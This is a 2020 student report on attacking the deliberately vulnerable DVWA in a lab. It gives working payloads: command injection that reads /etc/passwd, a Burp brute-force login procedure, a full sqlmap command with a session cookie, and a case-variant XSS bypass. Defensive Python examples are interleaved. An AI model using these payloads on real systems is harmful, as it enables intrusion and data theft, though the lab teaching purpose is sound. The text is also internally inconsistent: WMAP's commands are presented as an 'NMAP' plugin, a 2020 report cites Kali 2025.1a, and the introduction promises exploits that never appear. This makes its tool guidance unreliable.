DVWA Report

The document discusses vulnerability detection and exploitation techniques for web applications, focusing on the Damn Vulnerable Web Application (DVWA) and tools like NMAP and Burp Suite. It outlines various exploits including command injection, brute force attacks, and SQL injection, detailing the methodologies and technical requirements for penetration testing. The goal is to educate future cybersecurity enthusiasts on identifying and mitigating web application vulnerabilities to enhance security.

VULNERABILITY DETECTION AND EXPLOITATION OF WEB APPLICATIONS

Apoorav Verma

[email protected]

A Project
Submitted to: Tech _Pupil Cybersecurity Internship

December 4, 2020
Table of Contents

Abstract
Introduction
Technical Requirements
1. Listing vulnerabilities using NMAP
2. DVWA - Command Injection
3. DVWA - Brute Force Exploit using Burp Suite
4. DVWA - SQL Injection integrating Burp and SQLMap
5. DVWA - Cross Site Scripting (Reflected)

UNIT – VULNERABILITY DETECTION AND EXPLOITATION OF WEB APPLICATIONS

Abstract
Web applications are subject to threats because they tend to be vulnerable. This unit focuses on detecting various
web application vulnerabilities and attempting to exploit them. The main goal is to identify and use some of the
tools for performing penetration testing on existing, publicly available vulnerable web applications.

Introduction
A web application is composed of several components, so its penetration testing needs a systematic approach. The
steps that need to be followed to exploit web applications according to the web application hacker's methodology [1]
are:

• Information gathering and enumeration: information gathering and enumeration of vulnerabilities are illustrated
with the nmap tool on the Damn Vulnerable Web Application in exploit 1 of this unit.
• Input-based issues and issues with specific functionality: input-related issues such as command injection and
brute force attacks are explained in the second and third exploits of the unit, while SQL injection, the 4th exploit,
focuses specifically on attacks on the database.
• Logical vulnerability detection: logical reasoning for detecting vulnerabilities is used in all the exploits, which
makes one aware of whether an exploit can be implemented and of the risk related to it.
• Authentication, session management and access control vulnerabilities: authentication bypass and session
hijacking, the 6th and 7th exploits, come under this category.
• Miscellaneous and information leakage tests: the 5th and 8th recipes on cross-site scripting and the last recipe on
unvalidated redirects and forwards highlight this category of attacks.

In order to perform the above-mentioned penetration testing procedure, publicly available vulnerable applications
are used, as the main goal is to make future enthusiasts learn the whole process so that information can be kept
secure, not to enable them to attack web applications.

Technical Requirements
The following web application will be used for testing purposes:

• Damn Vulnerable Web Application (DVWA)

This web application already exists within a vulnerable operating system named Metasploitable 2, and the best
system to perform the penetration testing from is Kali Linux with Docker. Hence, the following two virtual operating
systems, which can be opened in VMware Workstation, are needed; the links are given below:

• Kali Linux (Kali-linux-2025.1a-installer-amd64): https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/
Kali needs to be configured with the basic settings, and its IP needs to be configured as 192.168.146.128
• Metasploitable 2 (Metasploitable2-Linux): https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
This operating system needs to be configured with the IP 192.168.146.133

DVWA can then be accessed from the web browser of the Kali machine configured above, from which the various
vulnerability detection methods and exploits will be performed; their recipes are discussed in the following chapters:

Figure 1. DVWA accessible from the kali virtual machine

References

[1] Damn Vulnerable Web Application (DVWA).
[2] Offensive Security, "Metasploitable 2," [Online]. Available

1. Listing vulnerabilities using NMAP

Since a set of vulnerabilities is needed before their recipes can be discussed, the first recipe with respect to web
applications is listing the vulnerabilities. NMAP will be used to achieve this. NMAP is a web application
vulnerability scanner plugin that exists within Kali Linux, integrated into Metasploit [2].

• Approach to be used
The following steps, suggested in [3], need to be followed in the terminal of the Kali machine configured earlier to
obtain the list of vulnerabilities:
1. Load the NMAP tool within the Metasploit framework.
2. Add a new site, then create the target.
3. Identify and enumerate the modules applicable to the target site.
4. Execute the identified modules.
5. List the vulnerabilities.
All the above steps will be applied to the Damn Vulnerable Web Application mentioned earlier.

• Vulnerability scanning technical details

Before the approach is applied, note that the user must be logged in as root in the terminal; to become root, use:
sudo su
After entering the root user's credentials, the msf database needs to be initialised so that the required plugin can be
loaded in msfconsole. This is done with:
msfdb init
Following the approach discussed above, the technical steps for the scan are:
Load the plugin into the Metasploit framework:
load nmap
Add a new site and then create the target:
nmap_sites -a 192.168.146.133
nmap_targets -t http://192.168.146.133/dvwa/index.php
Enumerate and then execute the applicable modules:
nmap_run -t
nmap_run -e
List the vulnerabilities found:
nmap_vulns -l

• Vulnerability findings

The following vulnerabilities were identified after a successful scan:

msf5 > nmap_vulns -l

[*] + [192.168.146.133] (192.168.146.133): scraper /
[*] scraper Scraper
[*] GET Metasploitable2 - Linux
[*] + [192.168.146.133] (192.168.146.133): directory /dav/
[*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): directory /doc/
[*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): directory /cgi-bin/
[*] directory Directory found.
[*] GET Res code: 403
[*] + [192.168.146.133] (192.168.146.133): directory /icons/
[*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): directory /index/
[*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): directory /phpMyAdmin/
[*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): directory /test/
[*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): file /index.php
[*] file File found.
[*] GET Res code: 404
[*] + [192.168.146.133] (192.168.146.133): file /dav
[*] file File found.
[*] GET Res code: 404
[*] + [192.168.146.133] (192.168.146.133): file /index
[*] file File found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): file /phpMyAdmin
[*] file File found.
[*] GET Res code: 301
[*] + [192.168.146.133] (192.168.146.133): file /test
[*] file File found.
[*] GET Res code: 301
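The listing above is line oriented: one "[*] +" header per finding, followed by its status line, so it can be parsed mechanically to separate the paths that actually answered (2xx/3xx) from the 403/404 noise and to pick out anything that looks like an exposed administrative console. The following Python is an added example, not part of this report or of the scanner; the sample text is constructed in the same shape as the output above, and the Finding class, the regular expressions and the "admin console" markers are this example's own.

```python
import re
from dataclasses import dataclass

# Constructed sample in the same shape as the scan listing above (not copied from a live scan).
SAMPLE_OUTPUT = """\
[*] + [192.168.146.133] (192.168.146.133): scraper /
[*] scraper Scraper
[*] GET Metasploitable2 - Linux
[*] + [192.168.146.133] (192.168.146.133): directory /dav/
[*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): directory /cgi-bin/
[*] directory Directory found.
[*] GET Res code: 403
[*] + [192.168.146.133] (192.168.146.133): file /index.php
[*] file File found.
[*] GET Res code: 404
[*] + [192.168.146.133] (192.168.146.133): file /phpMyAdmin
[*] file File found.
[*] GET Res code: 301
"""


@dataclass
class Finding:
    host: str
    kind: str     # "directory", "file" or "scraper"
    path: str
    status: int   # HTTP response code of the GET, 0 when the entry reports none


# "[*] + [host] (addr): kind path"
HEADER = re.compile(r"^\[\*\] \+ \[(?P<host>[^\]]+)\] \([^)]*\): (?P<kind>\w+) (?P<path>\S+)$")
# "[*] GET Res code: NNN"
STATUS = re.compile(r"^\[\*\] GET Res code: (?P<code>\d+)$")


def parse_findings(text):
    """Turn the line-oriented listing into Finding records, one per '[*] +' header."""
    findings = []
    current = None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            current = Finding(m["host"], m["kind"], m["path"], 0)
            findings.append(current)
            continue
        m = STATUS.match(line)
        if m and current is not None:
            current.status = int(m["code"])
            current = None  # one status line per entry
    return findings


def reachable_paths(findings):
    """Paths that answered 2xx or 3xx; the 403/404 entries are usually noise for triage."""
    return sorted(f.path for f in findings if 200 <= f.status < 400)


def exposed_admin_consoles(findings, markers=("phpmyadmin",)):
    """Reachable paths whose name suggests an administrative console that should not be public."""
    return [p for p in reachable_paths(findings) if any(m in p.lower() for m in markers)]
```

Run over the page's full listing, the same functions reduce 14 entries to the handful of reachable paths, and the reachable phpMyAdmin instance is the item a defender would remediate first.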

• Summary: This method shows how nmap can be used to identify a set of vulnerabilities for the given targets in
msfconsole once the msfdb database has been initialised.

Once one is familiar with scanning the vulnerabilities of DVWA and Mutillidae, one can move on to the web application
exploits discussed in the coming chapters.

References
[3] Rahalkar, S. (2020). Web Application scanning using NMAP. In Chapter 7: Web Application Scanning with Metasploit,
in Metasploit 5.0 for Beginners: Perform penetration testing to secure your IT environment against threats and
vulnerabilities (2nd ed.). Packt Publishing. Available at:
https://learning.oreilly.com/library/view/metasploit-50-for/9781838982669/B15240_07_Final_ASB_ePub.xhtml

2. DVWA - Command Injection

Command injection is a type of input-based exploit in which the attacker supplies specific commands or code through an
input field of a vulnerable application. In this chapter, the focus is on learning the process of checking the source
code of the web application (in this case DVWA) and then placing commands in the input field to retrieve sensitive
information from the application.

• Approach to be used
Damn Vulnerable Web Application comes with three security levels: low, medium and high. The command injection exploit
will be attempted at every security level after going through the source code and identifying the vulnerability in the
code, along with the reasoning and the output that would be useful from an attacker's perspective.

• Vulnerability scanning technical details

After going through the source code at all security levels and using reference [4], the following vulnerable code was
considered for the exploits.
Note: the source code can be viewed from the button at the bottom right of the screen.
Low security:
$cmd = shell_exec( 'ping -c 3 ' . $target ); // no constraints: whatever is entered is passed to the shell

Medium security:
$substitutions = array( // only these two character sequences are removed,
    '&&' => '',         // so other special characters can still be used with commands
    ';'  => '',
);

High security: no such vulnerability was detected in the source code. This can vary with the version of DVWA
configured on the system.

• Exploit execution details

A set of special characters can be used at the low security level together with commands to retrieve information:
&, &&, |, || and ; [4].
Looking at the constraints at the medium security level, &, | and || can still be used with commands that retrieve
data.
An attempt to check the kernel version and other system information of the web application's host will be made using
uname -a
Moreover, an attempt to retrieve the contents of the passwd file will be made so that sensitive information can be
accessed, using
cat /etc/passwd
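The medium-level substitution list only removes "&&" and ";", which is why the other shell metacharacters listed above still reach the shell. The following Python is an added example, not DVWA's code: medium_filter mirrors that blacklist, survives_blacklist checks what the filter leaves behind, and validate_ping_target together with build_ping_command show the hardened form, an allow-list on the input (it must be an IP address) combined with passing the target as a separate argument instead of through a shell. The function names and sample inputs are this example's own; build_ping_command only returns the argument vector and does not run ping.

```python
import ipaddress
import re

# The medium-level blacklist quoted above: only "&&" and ";" are stripped.
MEDIUM_SUBSTITUTIONS = {"&&": "", ";": ""}


def medium_filter(user_input):
    """Mirror of the str_replace style blacklist (assumption: substitutions applied in listed order)."""
    out = user_input
    for bad, replacement in MEDIUM_SUBSTITUTIONS.items():
        out = out.replace(bad, replacement)
    return out


# Characters the shell treats specially when the string is handed to shell_exec().
SHELL_METACHARACTERS = re.compile(r"[&|;`$<>()\n]")


def survives_blacklist(user_input):
    """True when the filtered input still carries shell metacharacters, i.e. the blacklist was not enough."""
    return SHELL_METACHARACTERS.search(medium_filter(user_input)) is not None


def validate_ping_target(user_input):
    """Allow-list validation: accept only a syntactically valid IPv4/IPv6 literal.
    Returns the normalised address string, or None for anything else."""
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        return None


def build_ping_command(user_input):
    """Argument vector for subprocess.run(argv) with shell=False: no shell parses the target,
    so the validated value is passed as one literal argument to ping."""
    target = validate_ping_target(user_input)
    if target is None:
        raise ValueError("target is not an IP address")
    return ["ping", "-c", "3", target]
```

A blacklist has to enumerate every character the shell cares about, in every encoding the shell accepts; an allow-list only has to describe the one thing the field legitimately takes, and removing the shell from the call path means a mistake in the allow-list no longer turns into command execution.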

• Exploit execution findings

Combining the special characters and the commands mentioned above produced the following outputs.
Input: uname -a
Output:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Input: 192.168.146.133| cat /etc/passwd


Output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false

• Summary
Across the security levels, the source code played an important role in identifying the vulnerabilities, and the
injected commands then retrieved a sensitive file, which can even lead to root access on the system running the web
application. Hence, command injection is a basic penetration test that every web application needs to pass, and every
enthusiast, whether programmer or tester, needs to learn about it.

References
[1] "Damn Vulnerable Web App (DVWA): Lesson 2: Command Execution Basic Testing". [Online]. Available:
https://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson2/index.html
[2] ap4che, "DVWA tutorial - Exploit Command injection (Low - Medium - High security)". [Online]. Available:
https://www.youtube.com/watch?v=ngYKuoJmAL4&list=LLYgqGxFDLtjgN84AexrFybA

3. DVWA - Brute Force Exploit using Burp Suite

A brute force attack is a type of attack in which the attacker uses trial and error to figure out user login
credentials or for other purposes [5]. DVWA is subject to brute force attacks, which can be carried out with the help
of a tool named Burp Suite; it intercepts requests by integrating with the web browser and then submits payloads taken
from an input list.

• Approach to be used
DVWA will be set to the low security level and Burp Suite will be integrated with the web browser using the default
proxy settings; the first request is intercepted after entering random user credentials on the brute force page of
DVWA. Once the request is intercepted, the retrieved raw information is sent to Intruder, where the cluster bomb attack
type is chosen in the Positions tab and two payloads are created together with the input list to perform the brute
force attack [6].

• Vulnerability scanning details

After going through the source code of the web page, it was found that a portion of the code helps in performing the
exploit with Burp Suite Intruder's Grep - Match option, which flags the responses containing a given string after a
number of trial-and-error attempts; the unflagged inputs are then the credentials that can be used to gain access to
the web application. The helpful code is:
else {
    // Login failed
    sleep(3);
    echo "<pre><br>Username and/or password incorrect.</pre>"; // useful string for Grep - Match
}

• Exploit execution details

The following steps need to be followed to perform the above-mentioned exploit:
1. In the connection settings of the web browser, set the manual HTTP proxy to 127.0.0.1 and the port to 8080. This
proxy server also needs to be set as the default for all protocols.

Figure 2. Connection settings

2. Enter random credentials on the brute force login page of DVWA, turn on the Intercept feature in the Proxy tab of
Burp Suite and, once the request is intercepted, send it to Intruder by right-clicking and choosing that option, as
shown below:

Figure 3. Send to intruder

3. Then set the attack type to cluster bomb in Intruder's Positions tab and add the payload positions by selecting
the values of username and password, as shown:

Figure 4. Choosing attack type and adding 2 payloads to perform brute force

4. In the Payloads tab, add the payload options for both payload sets; one can choose from the keyword list or import
them from the local system. However, for practical purposes only 2 payload options were added, to differentiate.
Finally, before starting, the string is added under Grep - Match in the Options tab and the flag option is selected.

• Exploit execution findings

With the implementation procedure discussed above, the following output was obtained:

Figure 5. Brute force attack results

For the username admin and the password "password", the flag is not ticked; it can be noted that the response length
is different, and one will be able to log in to the web page as admin.
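From the defender's side, the two properties that make Intruder's Grep - Match work (a constant failure message, and a burst of near-identical requests of which exactly one gets a different answer) are also what make the attack visible in the web server log. The following Python is an added example, not part of this report or of DVWA: it parses constructed Apache combined-format lines (shaped after the request on the page, not taken from the lab), flags any source that sends at least five login requests inside a sliding 60-second window, and reports the response size that differs from that source's usual failure size. The log lines, the threshold and the window are this example's assumptions.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/dvwa/vulnerabilities/brute/"

# Constructed Apache combined-format lines (not taken from the lab): DVWA's brute-force page
# submits username and password as GET parameters, so each guess is its own request line.
SAMPLE_LOG = """\
192.168.146.128 - - [04/Dec/2020:22:01:01 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess1&Login=Login HTTP/1.1" 200 4723
192.168.146.128 - - [04/Dec/2020:22:01:04 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess2&Login=Login HTTP/1.1" 200 4723
192.168.146.128 - - [04/Dec/2020:22:01:07 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess3&Login=Login HTTP/1.1" 200 4723
192.168.146.140 - - [04/Dec/2020:22:01:09 +0000] "GET /dvwa/vulnerabilities/brute/?username=user&password=guess1&Login=Login HTTP/1.1" 200 4723
192.168.146.128 - - [04/Dec/2020:22:01:10 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess4&Login=Login HTTP/1.1" 200 4723
192.168.146.128 - - [04/Dec/2020:22:01:13 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess5&Login=Login HTTP/1.1" 200 4755
192.168.146.128 - - [04/Dec/2020:22:01:16 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1203
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)$'
)


def parse_line(line):
    """Return (ip, timestamp, path-without-query, status, size), or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = m["target"].split("?", 1)[0]
    return m["ip"], ts, path, int(m["status"]), int(m["size"])


def detect_login_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Sources that made at least `threshold` login requests inside a sliding window.
    Returns {ip: peak number of requests seen in one window}."""
    recent = defaultdict(deque)
    flagged = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path, _status, _size = parsed
        if path != LOGIN_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:       # drop requests that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged


def odd_response_sizes(log_text, ip):
    """Response sizes from `ip` to the login page that differ from its most common size.
    With a constant failure message (the sleep(3) branch above) the odd size marks the one
    request that received a different page, i.e. the guess that probably succeeded."""
    sizes = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed and parsed[0] == ip and parsed[2] == LOGIN_PATH:
            sizes.append(parsed[4])
    if not sizes:
        return []
    common = Counter(sizes).most_common(1)[0][0]
    return sorted({s for s in sizes if s != common})
```

The sleep(3) on failure slows down a single-threaded guesser but does nothing against a parallel one; an account lockout or per-source rate limit keyed on the same counter used here is the control that actually stops the attack, and the odd-size response tells the responder which attempt to treat as a successful login.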

• Summary
This attack introduces enthusiasts to the tool named Burp Suite, which can be used to perform web application exploits,
and it helps one understand how important it is to hide the source code, as otherwise it can be used by hackers to
perform a brute force attack in the way shown here.

• References
[3] Kaspersky, "Brute Force Attack: Definition and Examples," www.kaspersky.com, 20-Oct-2019. [Online]. Available:
https://www.kaspersky.com/resource-center/definitions/brute-force-attack.
[4] admiralgaust, "Brute Forcing with Burp Suite (DVWA)", 14-Aug-2018. [Online]. Available:
https://www.youtube.com/watch?v=jzlv0n13ln0.

4. DVWA - SQL Injection integrating Burp and SQLMap

SQL injection is a technique used by attackers to fetch database-related information by inserting an SQL query into
an input field [7]. Various queries can be used to retrieve system data, but in this case Burp Suite will be used to
intercept a simple query, and its output will be used in the terminal with sqlmap to fetch as much database
information as possible.

• Approach to be used
DVWA will be subjected to this enumeration exploit, and the same steps as in the previous exploit need to be applied
to integrate the web browser with Burp Suite by setting the manual proxy. The difficulty level will be set to medium,
and it will be checked whether information can be retrieved. Then, following the instructions in [8], the input will
be intercepted and the relevant information in the raw data will be used to gather further details with the sqlmap
command in the terminal.

• Vulnerability scanning details

No restriction was found within the source code of the page: no exceptions are applied to the input being retrieved,
so an attacker is able to use 'or' and 'and' to retrieve multiple rows.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; // the query text can be modified through $id
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); // no exception handling; errors go to the user
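The $getid line builds the SQL text by string concatenation, so quote characters inside $id become part of the query rather than part of the value. The following Python uses an in-memory SQLite table with constructed rows (not DVWA's data) to show that concatenated form beside its hardened form, a parameterised query, plus the type check that a numeric id allows. It is an added example, not DVWA's code; apart from the users table and its user_id, first_name and last_name columns, which the quoted query names, the row values and function names are this example's own.

```python
import sqlite3


def make_demo_db():
    """In-memory table shaped like the users table in the quoted query; the rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Alice", "Example"), (2, "Bob", "Example"), (3, "Carol", "Example")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirror of the quoted PHP: the value is spliced into the SQL text, so a quote in it
    ends the string literal and whatever follows is parsed as SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterised(conn, user_id):
    """Hardened form: the value travels as a bound parameter and is never parsed as SQL,
    whatever characters it contains."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def lookup_validated(conn, user_id):
    """Defence in depth: user_id is an integer by contract, so anything that is not one is
    rejected before it reaches the database at all."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return []
    return lookup_parameterised(conn, uid)
```

The parameterised form is the fix; the integer check on top of it also removes the error-message channel the "or die(mysql_error())" line opens, since a malformed id never produces a database error to display.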

• Exploit execution details

The following steps need to be followed in order to perform the exploit:
1. The same first step as in Exploit 3 needs to be followed to set the manual proxy that integrates the browser with
Burp Suite.

Figure 6. Connection Settings

2. One can simply input 1 in the input field to fetch data about user id 1; here is the output that will be
generated:

Figure 7. Simple entry into the field

3. The main aim is to intercept this input and retrieve the raw request shown below, in which the important
information has been highlighted:

GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 192.168.146.133
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.146.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit
Connection: close
Cookie: security=medium; PHPSESSID=135fbad9b4a3a31fbcecfc0951af99cf
Upgrade-Insecure-Requests: 1
4. This information is passed as arguments to the sqlmap command in the terminal, and the complete command is:
sqlmap -u "http://192.168.146.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=135fbad9b4a3a31fbcecfc0951af99cf" --dbs

• Exploit execution findings

The output of the above command was very long; the relevant part is shown below:

[22:05:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 4.1
[22:05:29] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

• Summary
This exploit helps in identifying the back-end database management system, which is MySQL, and also fetches the
available databases, which could be attacked further if exploited in depth. Hence, this exploit retrieves database
information by performing SQL injection while integrating the use of Burp and SQLMap.

• References
[5] “(Damn Vulnerable Web App (DVWA): Lesson 6),” Damn Vulnerable Web App (DVWA): Lesson 6:
Manual SQL Injection, John the Ripper. [Online]. Available:
https://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/index.html.
[6] Sai, “Burpsuite - 1 (SQL injection,intercepting),” Hacking Monks, 01-Jan-1970. [Online]. Available:
http://www.hackingmonks.net/2017/01/burpsuite-1-sql-injectionintercepting.html.

5. DVWA - Cross Site Scripting (Reflected)

A reflected cross-site scripting attack is a type of attack in which the attacker inputs data in the form of HTTP
requests so that the output is reflected in the way the attacker wishes [9]. If the attacker is able to gain access
to a legitimate user's browser in this way, the attacker becomes capable of everything that user is capable of. This
attack can be tested at all three levels in DVWA, low, medium and high, which will be part of the process in this
exploit.

• Approach to be used
HTML tags will be used as input to reflect the outputs after going through the source code in all three security
modes of the DVWA application.

• Vulnerability scanning details

Upon analysing the source code of the XSS (reflected) page, the following findings were made regarding the
vulnerabilities at the different security levels.

Medium mode:
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // restriction only on the lowercase <script> tag

• Exploit execution details

The following scripts need to be executed at the three different levels to retrieve the information, following the
guidelines in [10], [11], and to learn the basics of this exploit.

Medium mode:
As only the lowercase script tag is restricted, the uppercase form can still be used:
<SCRIPT>alert("Hello h e l l o medium mode allows script tag to work in caps for xss reflected")</SCRIPT>
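str_replace performs an exact, case-sensitive match, so removing '<script>' leaves '<SCRIPT>' untouched, which is exactly what the medium-mode input above relies on. The following Python is an added example, not DVWA's code: medium_filter mirrors the blacklist, render_escaped shows the hardened form (encoding the value for the HTML text context it is reflected into, which is what PHP's htmlspecialchars does), and contains_markup checks whether a rendered string still carries an opening tag. The function names and the test inputs are this example's own.

```python
import html
import re


def medium_filter(name):
    """Mirror of the medium-level str_replace above: exact, case-sensitive removal of '<script>'."""
    return "Hello " + name.replace("<script>", "")


def render_escaped(name):
    """Hardened form: encode the value for an HTML text context, so <, >, &, " and ' are shown
    as characters instead of being parsed as markup (the equivalent of PHP's htmlspecialchars
    with ENT_QUOTES)."""
    return "Hello " + html.escape(name, quote=True)


# An opening tag: '<' immediately followed by a letter. Closing tags without an opener are inert.
OPENING_TAG = re.compile(r"<[a-zA-Z]")


def contains_markup(rendered):
    """True if the rendered page still carries something a browser would parse as an element."""
    return OPENING_TAG.search(rendered) is not None
```

The blacklist fails on the first case variant because it reasons about the input; output encoding reasons about the context the data lands in, so every input, including ones nobody has thought of yet, is rendered as text.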

• Exploit execution findings

The following outputs were generated when the tags discussed above were applied.

Medium mode:

Figure 9. Medium mode xss reflected

• Summary
This exploit helps in identifying vulnerabilities in the source code that can further lead to exploitation, and it
teaches web application pen testers the concept of reflected cross-site scripting.

• References
[7] "What is reflected XSS (cross-site scripting)? Tutorial & Examples: Web Security Academy". [Online]. Available:
https://portswigger.net/web-security/cross-site-scripting/reflected.
[8] Bubbah Smith, "DVWA - XSS reflected low, medium and high security". [Online]. Available:
https://www.youtube.com/watch?v=Uvq1IP2I-mQ.
[9] M. S. da Veiga, "DVWA 1.9+: XSS Reflected," Medium, 04-Oct-2019. [Online]. Available:
https://medium.com/hacker-toolbelt/dvwa-1-9-xss-reflected-58047a2d0ac1.
